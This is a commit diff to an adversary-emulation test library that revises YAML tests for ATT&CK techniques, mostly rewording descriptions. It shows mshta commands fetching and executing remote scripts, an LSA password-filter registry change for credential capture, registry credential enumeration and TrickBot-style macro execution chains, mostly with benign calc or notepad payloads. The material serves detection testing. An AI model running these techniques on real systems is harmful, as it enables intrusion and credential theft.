T1170 T1174 T1204 T1214 T1216 Test Improvements (#948)

* T1170 * slight updates * T1214 * add descriptions * fix spelling
2020-04-24 14:28:39 -05:00
parent 9d1146ae8a
commit 5618b90ef4
6 changed files with 18 additions and 32 deletions
@@ -5,8 +5,7 @@ display_name: Mshta
 atomic_tests:
 - name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
  description: |
-    Test execution of a remote script using mshta.exe
-    Upon execution calc.exe will be launched
+    Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched.
  supported_platforms:
    - windows
  input_arguments:
@@ -20,39 +19,21 @@ atomic_tests:
    command: |
      mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();

- name: Mshta calls a local VBScript file to launch notepad.exe
-  description: Tests execution of a local program by a VBScript file called by Mshta
-
-  supported_platforms:
-    - windows
-
-  input_arguments:
-    local_file_path:
-      description: Create a local VBScript file
-      type: path
-      default: C:\Temp\mshta_notepad.vbs
-
-  executor:
-    name: command_prompt
-    command: |
-      mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""#{local_file_path}"")(window.close)")
-
 - name: Mshta executes VBScript to execute malicious command
  description: |
-    Run a local VB script to run local user enumeration powershell command
-
+    Run a local VB script to run local user enumeration powershell command.
    This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
+    Upon execution, a new PowerShell windows will be opened that displays user information.
  supported_platforms:
    - windows
  executor:
    name: command_prompt
    command: |
-      mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file $PathToAtomicsFolder\T1170\src\powershell.ps1"":close")
+      mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file PathToAtomicsFolder\T1170\src\powershell.ps1"":close")

 - name: Mshta Executes Remote HTML Application (HTA)
  description: |
-    Execute an arbitrary remote HTA.
-    Upon execution calc.exe will be launched
+    Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
  supported_platforms:
    - windows
  input_arguments:
@@ -34,4 +34,4 @@ atomic_tests:
      $notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
      $notificationPackagesValues += $passwordFilterName
      Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
-      Restart-Computer -Confirm
+      Restart-Computer -Confirm
@@ -5,7 +5,7 @@ display_name: User Execution
 atomic_tests:
 - name: OSTap Style Macro Execution
  description: |
-    This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. The .jse file in turn launches wscript.exe.
+    This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
    Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.

    This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
@@ -79,7 +79,7 @@ atomic_tests:

 - name: Maldoc choice flags command execution
  description: |
-    This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders
+    This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched.
    Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.

  supported_platforms:
@@ -118,6 +118,7 @@ atomic_tests:
 - name: OSTAP JS version
  description: |
    Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
+    
    Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.

  supported_platforms:
@@ -5,7 +5,7 @@ display_name: Credentials in Registry
 atomic_tests:
 - name: Enumeration for Credentials in Registry
  description: |
-    Queries to enumerate for credentials in the Registry.
+    Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed.

  supported_platforms:
    - windows
@@ -19,7 +19,8 @@ atomic_tests:

 - name: Enumeration for PuTTY Credentials in Registry
  description: |
-    Queries to enumerate for PuTTY credentials in the Registry.
+    Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry
+    entries are found, they will be displayed.

  supported_platforms:
    - windows
@@ -25,6 +25,7 @@ atomic_tests:
 - name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
  description: |
    Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command.
+    Upon execution, calc.exe will be launched.

  supported_platforms:
    - windows
@@ -42,6 +42,7 @@ atomic_tests:
 - name: List Google Chrome Bookmarks on Windows with powershell
  description: |
    Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks.
+    Upon execution, paths that contain bookmark files will be displayed.

  supported_platforms:
    - windows
@@ -49,11 +50,12 @@ atomic_tests:
  executor:
    name: powershell
    command: |
-            where.exe /R C:\Users\ Bookmarks
+      Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force

- name: List Google Chrome Bookmarks on Windows with command prompt
+- name: List Google Chrome Bookmarks on Windows with command prompt.
  description: |
    Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks.
+    Upon execution, paths that contain bookmark files will be displayed.

  supported_platforms:
    - windows
@@ -61,4 +63,4 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-            where /R C:\Users\ Bookmarks
+      where /R C:\Users\ Bookmarks